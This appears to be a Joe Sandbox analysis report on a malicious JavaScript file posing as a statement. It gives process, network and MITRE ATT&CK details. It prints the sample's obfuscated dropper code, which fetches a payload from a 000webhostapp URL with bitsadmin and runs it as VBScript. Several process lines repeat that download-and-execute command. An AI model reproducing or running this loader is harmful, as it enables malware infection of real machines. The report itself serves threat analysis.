Source: svchost.exe, 00000004.00000002.3507509647.00000207FC83F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3507540963.00000207FC855000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110 C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq			Jump to behavior

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	12 Scripting	Valid Accounts	Windows Management Instrumentation	1 BITS Jobs	11 Process Injection	2 Virtualization/Sandbox Evasion	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	12 Scripting	1 DLL Side-Loading	1 BITS Jobs	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	Logon Script (Windows)	11 Process Injection	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	22 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
New_Statement-8723107.js	8%	ReversingLabs

Name	IP	Active	Malicious	Reputation
us-east-1.route-1.000webhost.awex.io	145.14.145.39	true	false	unknown
aeroox.000webhostapp.com	unknown	unknown	true	unknown
171.39.242.20.in-addr.arpa	unknown	unknown	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://g.live.com/odclientsettings/ProdV21C:	svchost.exe, 00000004.00000003.2235150076.00000207FC6E0000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr	false	unknown
http://crl.ver)	svchost.exe, 00000004.00000002.3507582577.00000207FC8A4000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110ttC:	bitsadmin.exe, 00000002.00000002.2586300092.00000191D1D28000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://g.live.com/odclientsettings/Prod1C:	edb.log.4.dr	false	unknown
https://aeroox.000webhostapp.com:443/dov/010111100110101101001111111101011011100101011110	svchost.exe, 00000004.00000002.3507582577.00000207FC862000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110	bitsadmin.exe, 00000002.00000002.2586300092.00000191D1D20000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3506655448.00000207F72AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3506935629.00000207F7B02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3507582577.00000207FC884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3507448837.00000207FC800000.00000004.00000020.00020000.00000000.sdmp	true	unknown
https://aeroox.000webhostapp.com/dov/0101111001101011010011111111010110111001010111101C:	svchost.exe, 00000004.00000002.3506385344.00000066C71FB000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3507840524.00000207FCA50000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2297842973.00000207FC6E1000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr	false	unknown
https://aeroox.000webhostapp.com/dov/010111100110101	wscript.exe, wscript.exe, 00000001.00000003.2586860487.0000020424D9B000.00000004.00000020.00020000.00000000.sdmp	true	unknown
https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110C:	bitsadmin.exe, 00000002.00000002.2586300092.00000191D1D28000.00000004.00000020.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
145.14.145.39	us-east-1.route-1.000webhost.awex.io	Netherlands		204915	AWEXUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1524248
Start date and time:	2024-10-02 17:24:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (Javascript) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	New_Statement-8723107.js
Detection:	MAL
Classification:	mal72.evad.winJS@7/3@2/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .js

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: New_Statement-8723107.js

Simulations

Behavior and APIs

Time	Type	Description
11:25:09	API Interceptor	2x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
145.14.145.39	XbIsXrWalr.dll	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
us-east-1.route-1.000webhost.awex.io	670un9Ls5U.vbs	Get hash	malicious	XWorm	Browse	145.14.144.105
	payload_1.vbs	Get hash	malicious	XWorm	Browse	145.14.145.86
	zoom_invite-2514503.js	Get hash	malicious	Unknown	Browse	145.14.145.161
	violation_report-0053170.js	Get hash	malicious	Unknown	Browse	145.14.144.32
	zoom_invite-2514503.js	Get hash	malicious	Unknown	Browse	145.14.145.85
	violation_report-0053170.js	Get hash	malicious	Unknown	Browse	145.14.145.107
	reported_account-3133028.js	Get hash	malicious	Unknown	Browse	145.14.145.70
	reported_violation-6847129.js	Get hash	malicious	Unknown	Browse	145.14.144.79
	reported_account-3133028.js	Get hash	malicious	Unknown	Browse	145.14.144.61
	reported_violation-6847129.js	Get hash	malicious	Unknown	Browse	145.14.144.77

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AWEXUS	670un9Ls5U.vbs	Get hash	malicious	XWorm	Browse	145.14.144.105
	payload_1.vbs	Get hash	malicious	XWorm	Browse	145.14.145.86
	zoom_invite-2514503.js	Get hash	malicious	Unknown	Browse	145.14.145.161
	violation_report-0053170.js	Get hash	malicious	Unknown	Browse	145.14.144.32
	zoom_invite-2514503.js	Get hash	malicious	Unknown	Browse	145.14.145.85
	violation_report-0053170.js	Get hash	malicious	Unknown	Browse	145.14.145.107
	reported_account-3133028.js	Get hash	malicious	Unknown	Browse	145.14.145.70
	reported_violation-6847129.js	Get hash	malicious	Unknown	Browse	145.14.144.79
	reported_account-3133028.js	Get hash	malicious	Unknown	Browse	145.14.144.61
	reported_violation-6847129.js	Get hash	malicious	Unknown	Browse	145.14.144.77

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	file.exe	Get hash	malicious	Credential Flusher	Browse	145.14.145.39
	https://tqaun.us12.list-manage.com/track/click?u=fb0a5f04fa3c936488ff652c3&id=d22699c399&e=ce0a629e2e	Get hash	malicious	HTMLPhisher	Browse	145.14.145.39
	file.exe	Get hash	malicious	Credential Flusher	Browse	145.14.145.39
	file.exe	Get hash	malicious	Credential Flusher	Browse	145.14.145.39
	file.exe	Get hash	malicious	Credential Flusher	Browse	145.14.145.39
	file.exe	Get hash	malicious	Unknown	Browse	145.14.145.39
	file.exe	Get hash	malicious	Credential Flusher	Browse	145.14.145.39
	https://svsjie.us9.list-manage.com/track/click?u=65baddd8dc4a29452f1a28eb2&id=dde4f4d149&e=6d04ecfe32	Get hash	malicious	Unknown	Browse	145.14.145.39
	test.exe	Get hash	malicious	Babadeda	Browse	145.14.145.39
	exit.exe	Get hash	malicious	Babadeda	Browse	145.14.145.39

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7456993296784059
Encrypted:	false
SSDEEP:	1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0N:9JZj5MiKNnNhoxuARmmmM
MD5:	612A17328AD9CF08032DBF2454DEE064
SHA1:	7B369D151E6103DC34EF708857C5DD392B791B25
SHA-256:	E60C07FDC657A35DC7F4F9509CC74E214B76ED82EEA31DD00583422556C6BBEC
SHA-512:	4BB62BAA41675B6DF0ADF805C508DD90CD85374E2D87597D11D55CB882CFAC52A57BBF9B7C77EE20F1E2FC924A206002668285FD193913084862CADE933F9257
Malicious:	false
Reputation:	low
Preview:	...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0x2021eb5d, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7555807433920828
Encrypted:	false
SSDEEP:	1536:tSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:tazaSvGJzYj2UlmOlOL
MD5:	EDA33454130D1A76A3A1ADC9B83C0A5F
SHA1:	A91D76CD29AB158203EF2A045AE2C0F7670AF3EC
SHA-256:	DCCAAB0403CBB70946A7B04AD20C24798430069BA9F352A78B5E176E757478CB
SHA-512:	E62FF8ACB922BE6DA52716CA381D2C5366274497583CF0AC4AE5A81AC27E0D544EBBC5409C4E95FA8195A95420DDE30F4A5FE85EF382B59566B384EACF930FE2
Malicious:	false
Reputation:	low
Preview:	!.]... .......7.......X\...;...{......................0.e......!...{?......\|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{....................................[Y.....\|....................m......\|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07894048318949429
Encrypted:	false
SSDEEP:	3:kuKYeb7i3EcvfNaAPaU1lYsTall/lalluxmO+l/SNxOf:kuKzb7SNDPaUgsTq/AgmOH
MD5:	6081770E6AC4904458D09BA63DBD05D5
SHA1:	E912AFBC6809061EEDD179E13B6B7C440D535429
SHA-256:	360998A8DD56D1EF691458544105D6E20C180680260E0CB562B04CF0606D9A54
SHA-512:	D5CF8C343A0ADAFDE90102168DFD4CBB6B71E7BAC3FB908798272DB087261382AE17318A40A1A6A368CE8D84516E829DB740F8368B53B2DBC1DBAF370C08E1E4
Malicious:	false
Reputation:	low
Preview:	.........................................;...{.......\|...!...{?..........!...{?..!...{?..g...!...{?...................m......\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Unicode text, UTF-8 text, with very long lines (6942), with CRLF line terminators
Entropy (8bit):	3.41959458902154
TrID:	Digital Micrograph Script (4001/1) 100.00%
File name:	New_Statement-8723107.js
File size:	268'280 bytes
MD5:	e435fc1fc9a3a3fb5133758ab9ea7e85
SHA1:	c59f9c185c510fa8458b1a84594107c77b7a1222
SHA256:	9bd5b1deaeb42874154d08cf30c677b22b028a880aaa1e0e51eb7955ba44f162
SHA512:	4e15fd0c79137b60381aa0cf11e685d8509c9a6e2707f554e01b8a603e8da3a969efa724936540a97119dc9babe606f7a3e3de0cb98d7832140f310bf1c52cd4
SSDEEP:	192:ir+nr+nr+nr+nr+nr+nr+nr+nr+nr+nr+nr+Yjqr+nr+nr+nr+nr+nr+nr+nr+nn:7xHR0J7PqFCR
TLSH:	F9448226BEDBAE81ED1810251DB7492DEDA8376B41E1517AACC857906EC408C3FE6CF1
File Content Preview:	//11/1'.../...7...'.../'0......1.../01/1/1/.........76...1...1'...1'.../....../.........'...////0'70...'...0...6......1.../1......1...//...1/717/...//1......111/0//...61...6...107...7...//.../....../...0...6....../'.../.../...'.../......///...0...1....../

File Icon


Icon Hash:	68d69b8bb6aa9a86

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 17:25:15.349570990 CEST	49715	443	192.168.2.6	145.14.145.39
Oct 2, 2024 17:25:15.349627018 CEST	443	49715	145.14.145.39	192.168.2.6
Oct 2, 2024 17:25:15.349685907 CEST	49715	443	192.168.2.6	145.14.145.39
Oct 2, 2024 17:25:15.351247072 CEST	49715	443	192.168.2.6	145.14.145.39
Oct 2, 2024 17:25:15.351263046 CEST	443	49715	145.14.145.39	192.168.2.6
Oct 2, 2024 17:25:15.865632057 CEST	443	49715	145.14.145.39	192.168.2.6
Oct 2, 2024 17:25:15.865792990 CEST	49715	443	192.168.2.6	145.14.145.39
Oct 2, 2024 17:25:15.868202925 CEST	49715	443	192.168.2.6	145.14.145.39
Oct 2, 2024 17:25:15.868216038 CEST	443	49715	145.14.145.39	192.168.2.6
Oct 2, 2024 17:25:15.868508101 CEST	443	49715	145.14.145.39	192.168.2.6
Oct 2, 2024 17:25:15.899058104 CEST	49715	443	192.168.2.6	145.14.145.39
Oct 2, 2024 17:25:15.943407059 CEST	443	49715	145.14.145.39	192.168.2.6
Oct 2, 2024 17:25:16.018884897 CEST	443	49715	145.14.145.39	192.168.2.6
Oct 2, 2024 17:25:16.019155025 CEST	49715	443	192.168.2.6	145.14.145.39
Oct 2, 2024 17:25:16.019187927 CEST	443	49715	145.14.145.39	192.168.2.6
Oct 2, 2024 17:25:16.019205093 CEST	49715	443	192.168.2.6	145.14.145.39
Oct 2, 2024 17:25:16.019222021 CEST	443	49715	145.14.145.39	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 17:25:15.313047886 CEST	52562	53	192.168.2.6	1.1.1.1
Oct 2, 2024 17:25:15.348582983 CEST	53	52562	1.1.1.1	192.168.2.6
Oct 2, 2024 17:25:35.334604979 CEST	53	64637	162.159.36.2	192.168.2.6
Oct 2, 2024 17:25:35.848546982 CEST	55081	53	192.168.2.6	1.1.1.1
Oct 2, 2024 17:25:35.858362913 CEST	53	55081	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 2, 2024 17:25:15.313047886 CEST	192.168.2.6	1.1.1.1	0xd472	Standard query (0)	aeroox.000webhostapp.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 17:25:35.848546982 CEST	192.168.2.6	1.1.1.1	0x44c3	Standard query (0)	171.39.242.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 2, 2024 17:25:15.348582983 CEST	1.1.1.1	192.168.2.6	0xd472	No error (0)	aeroox.000webhostapp.com	us-east-1.route-1.000webhost.awex.io		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 17:25:15.348582983 CEST	1.1.1.1	192.168.2.6	0xd472	No error (0)	us-east-1.route-1.000webhost.awex.io		145.14.145.39	A (IP address)	IN (0x0001)	false
Oct 2, 2024 17:25:35.858362913 CEST	1.1.1.1	192.168.2.6	0x44c3	Name error (3)	171.39.242.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49715	145.14.145.39	443	5560	C:\Windows\System32\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 15:25:15 UTC	199	OUT	HEAD /dov/010111100110101101001111111101011011100101011110 HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: aeroox.000webhostapp.com
2024-10-02 15:25:16 UTC	271	IN	HTTP/1.1 424 Date: Wed, 02 Oct 2024 15:25:15 GMT Content-Type: text/html Content-Length: 5096 Connection: close ETag: "65dc89a9-13e8" Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: 9d72fe1bd0bc84ea4aa71b9a68424983

Target ID:	1
Start time:	11:25:08
Start date:	02/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New_Statement-8723107.js"
Imagebase:	0x7ff798150000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:25:09
Start date:	02/10/2024
Path:	C:\Windows\System32\bitsadmin.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110 C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq
Imagebase:	0x7ff7946c0000
File size:	211'456 bytes
MD5 hash:	01AAB62D5799F75B0D69EB29C1CA6855
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:25:09
Start date:	02/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:25:09
Start date:	02/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	11:25:44
Start date:	02/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq
Imagebase:	0x7ff798150000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

JavaScript Code

Call Graph

Executed
Not Executed

Script:

Code
0	var _dvrcnuxkdpttoluswdggoilgeabpjcjbmtbgidpfkjbsjvciacpzjiyixhxwlhohsdoilpofwoxhhu = 'WScript';
1	var _ldzfryssxncxpiyiolbxwenqacitjiwgokwvuekudlqfukhkkeohzdmsfbfxtfvylqbtkqixhoexul = 'Shell';
2	var _ngcotabpdrjdykbnjxnqndzzanpspljdzcvfcrnpbhhgpzxpeylezlvcsluopgvfemqljxrsomerue = 'ngcotabpdrjdykbnjxnqndzzanpspljdzcvfcrnpbhhgpzxpeylezlvcsluopgvfemqljxrsomerue';
3	var _lrklniztxfylagofqmvxmwdtcclyjmycbpofhaseiqmbxxzntgjooaoidxclcuirbggqwnrgdcjjde = 'Temp';
4	var _ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq = 'ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq';
5	var _gzkrywymatsibyuobflsglccillqvhxspnshjhiusyanvaqrlaonjhuzpcmwkbkqnplragopenydzm = 'gzkrywymatsibyuobflsglccillqvhxspnshjhiusyanvaqrlaonjhuzpcmwkbkqnplragopenydzm';
6	var _ywimcbuuobxkqtyruierskvojytgvyozxtngzpyuyoschrsxzsnhkoxuecxxpjbigiwqidssgkhliz = 'bitsadmin';
7	var _zcemckigwzlccroxjnmbzzgrequaekbxiiblxvcykacrohvhgplqseotqqvqyebrtjtbxlzjowxcrt = 'transfer';
8	var _qydlkwhhfyznttxjjxepmghjufnsoiqgeqciykezsctihljdotpqmhguvjfqujoqhcakvdpcbjflym = 'wscript //E:VBScript ';
9	var mujgkpckfxxsmnhqnynzhnenqywyalfwlbdjtwleqvqhwkpnnfeibrhytngibmdybapbsbmbiqlptt = new ActiveXObject ( _dvrcnuxkdpttoluswdggoilgeabpjcjbmtbgidpfkjbsjvciacpzjiyixhxwlhohsdoilpofwoxhhu + '.' + _ldzfryssxncxpiyiolbxwenqacitjiwgokwvuekudlqfukhkkeohzdmsfbfxtfvylqbtkqixhoexul );
10	var ngcotabpdrjdykbnjxnqndzzanpspljdzcvfcrnpbhhgpzxpeylezlvcsluopgvfemqljxrsomerue = '%' + _lrklniztxfylagofqmvxmwdtcclyjmycbpofhaseiqmbxxzntgjooaoidxclcuirbggqwnrgdcjjde + '%\\' + _ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq;
11	var gzkrywymatsibyuobflsglccillqvhxspnshjhiusyanvaqrlaonjhuzpcmwkbkqnplragopenydzm = 'https://';
12	var rdjmnvheoimsqfqmyzcpxumxbksxgfwrxdkmzsamctetpwkknhzybceuvotdatxeygpmeurwyaustg = 'aeroox.000webhostapp.';
13	var llfjfcstfkhpkgwvivxyacnsxciynrmmljjexcwjwnvmhrwacseidvxawchslmgmjngoqyjgbdydgl = 'com/dov/';
14	var abnbeitwhomwmfftbdscgnoecotvezqjajzznzeoqctdpowxlyikgnynomoqvjqifiqfrjczahcwlq = '010111100110101101001111111101011011100101011110';
15	var mipfnburwxuibqpnkmqjalezneebxratqhpzblqcmlzixsrkbgoyuyhyfydwsryfgnglagzyvamtit = _ywimcbuuobxkqtyruierskvojytgvyozxtngzpyuyoschrsxzsnhkoxuecxxpjbigiwqidssgkhliz + ' /' + _zcemckigwzlccroxjnmbzzgrequaekbxiiblxvcykacrohvhgplqseotqqvqyebrtjtbxlzjowxcrt + ' 8 ' + gzkrywymatsibyuobflsglccillqvhxspnshjhiusyanvaqrlaonjhuzpcmwkbkqnplragopenydzm + rdjmnvheoimsqfqmyzcpxumxbksxgfwrxdkmzsamctetpwkknhzybceuvotdatxeygpmeurwyaustg + llfjfcstfkhpkgwvivxyacnsxciynrmmljjexcwjwnvmhrwacseidvxawchslmgmjngoqyjgbdydgl + abnbeitwhomwmfftbdscgnoecotvezqjajzznzeoqctdpowxlyikgnynomoqvjqifiqfrjczahcwlq + ' ' + ngcotabpdrjdykbnjxnqndzzanpspljdzcvfcrnpbhhgpzxpeylezlvcsluopgvfemqljxrsomerue;
16	var ffrwdrlejmhkttztuccuvhkliikhhoclrzxqlmysuzjlorpvhdfcfayvzrfckzgaqvinhwnapeadbm = _qydlkwhhfyznttxjjxepmghjufnsoiqgeqciykezsctihljdotpqmhguvjfqujoqhcakvdpcbjflym + ngcotabpdrjdykbnjxnqndzzanpspljdzcvfcrnpbhhgpzxpeylezlvcsluopgvfemqljxrsomerue;
17	mujgkpckfxxsmnhqnynzhnenqywyalfwlbdjtwleqvqhwkpnnfeibrhytngibmdybapbsbmbiqlptt.run ( mipfnburwxuibqpnkmqjalezneebxratqhpzblqcmlzixsrkbgoyuyhyfydwsryfgnglagzyvamtit, 0, true );	run("bitsadmin /transfer 8 https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110 %Temp%\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq",0,true) ➔ -2145844824
18	mujgkpckfxxsmnhqnynzhnenqywyalfwlbdjtwleqvqhwkpnnfeibrhytngibmdybapbsbmbiqlptt.run ( ffrwdrlejmhkttztuccuvhkliikhhoclrzxqlmysuzjlorpvhdfcfayvzrfckzgaqvinhwnapeadbm );	run("wscript //E:VBScript %Temp%\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq") ➔ 0

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM).BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
Tactics:	Defense Evasion, Persistence
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, Service: Service Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

